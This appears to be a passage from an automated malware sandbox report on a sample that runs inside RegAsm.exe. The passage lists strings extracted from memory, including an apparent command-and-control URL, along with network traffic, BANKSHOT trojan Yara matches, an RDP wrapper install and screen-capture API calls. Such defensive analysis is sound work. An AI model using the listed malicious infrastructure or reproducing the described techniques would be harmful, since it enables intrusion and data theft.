Source: 76561199780418869[1].htm.10.dr	String found in binary or memory: https://store.steampowered.com/
Source: 76561199780418869[1].htm.10.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.2356059269.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009323531.0000000001706000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privac
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: KJEHJKJEBGHJJKEBGIECAAFIJK.4.dr	String found in binary or memory: https://support.mozilla.org
Source: KJEHJKJEBGHJJKEBGIECAAFIJK.4.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: KJEHJKJEBGHJJKEBGIECAAFIJK.4.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: userAFHDHCAAKE.exe, 00000007.00000002.2211440894.0000000003945000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 0000000A.00000002.2967028725.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5ed
Source: RegAsm.exe, 00000011.00000002.2351016346.000000000133A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3006610464.000000000164A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wallkedsleeoi.shop/api
Source: RegAsm.exe, 0000003A.00000002.3006610464.000000000164A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wallkedsleeoi.shop/api1
Source: RegAsm.exe, 00000004.00000002.2558214387.00000000278D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2971689518.0000000001396000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2971689518.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, FCFBFB.10.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: RegAsm.exe, 00000004.00000002.2558214387.00000000278D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2971689518.0000000001396000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2971689518.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, FCFBFB.10.dr	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: RegAsm.exe, 0000000A.00000002.3004111207.00000000326DA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3011454614.000000003E5B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2991833076.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2995997954.00000000267F5000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe	String found in binary or memory: https://www.entrust.net/rpa0
Source: KJEHJKJEBGHJJKEBGIECAAFIJK.4.dr	String found in binary or memory: https://www.mozilla.org
Source: RegAsm.exe, 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2980570316.0000000019C5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: KJEHJKJEBGHJJKEBGIECAAFIJK.4.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: RegAsm.exe, 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2980570316.0000000019C5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: KJEHJKJEBGHJJKEBGIECAAFIJK.4.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: RegAsm.exe, 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2980570316.0000000019C5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: JECAFH.10.dr, KJEHJKJEBGHJJKEBGIECAAFIJK.4.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: RegAsm.exe, 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: RegAsm.exe, 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: RegAsm.exe, 0000000A.00000002.2967028725.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: KJEHJKJEBGHJJKEBGIECAAFIJK.4.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: JECAFH.10.dr, KJEHJKJEBGHJJKEBGIECAAFIJK.4.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: RegAsm.exe, 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2980570316.0000000019C5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: JECAFH.10.dr, KJEHJKJEBGHJJKEBGIECAAFIJK.4.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004C2000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004E1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004DA000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004C8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004CE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004D4000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 172.67.194.216:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.182:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.208.139:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.144:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.194.216:443 -> 192.168.2.5:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.5:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.58.182:443 -> 192.168.2.5:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.208.139:443 -> 192.168.2.5:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.144:443 -> 192.168.2.5:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.5:49773 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00419010 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

4_2_00419010

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.RegAsm.exe.43dcd8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
Source: 10.2.RegAsm.exe.43f8e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
Source: 10.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
Source: 0000000A.00000002.2967028725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth

.NET source code contains very large array initializations

Source: file.exe, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 314368
Source: userAFHDHCAAKE.exe.4.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 393216
Source: 66f5db9e54794_vfkagks[1].exe.4.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 393216
Source: userGCAEHDBAAE.exe.4.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 365056
Source: 66f5dbaca34ac_lfdnsafnds[1].exe.4.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 365056

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C30B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	4_2_6C30B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C30B8C0 rand_s,NtQueryVirtualMemory,	4_2_6C30B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C30B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	4_2_6C30B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2AF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	4_2_6C2AF280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040145B GetCurrentProcess,NtQueryInformationProcess,	10_2_0040145B

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

File created: C:\Windows\System32\rfxvmt.dll

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EA0C40	0_2_00EA0C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2A35A0	4_2_6C2A35A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C31542B	4_2_6C31542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C31AC00	4_2_6C31AC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2E5C10	4_2_6C2E5C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2F2C10	4_2_6C2F2C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2B5440	4_2_6C2B5440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C31545C	4_2_6C31545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3034A0	4_2_6C3034A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C30C4A0	4_2_6C30C4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2B6C80	4_2_6C2B6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2AD4E0	4_2_6C2AD4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2E6CF0	4_2_6C2E6CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2B64C0	4_2_6C2B64C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2CD4D0	4_2_6C2CD4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2BFD00	4_2_6C2BFD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2CED10	4_2_6C2CED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2D0512	4_2_6C2D0512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3085F0	4_2_6C3085F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2E0DD0	4_2_6C2E0DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C309E30	4_2_6C309E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2F5600	4_2_6C2F5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2E7E10	4_2_6C2E7E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C316E63	4_2_6C316E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2AC670	4_2_6C2AC670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2F2E4E	4_2_6C2F2E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2C4640	4_2_6C2C4640
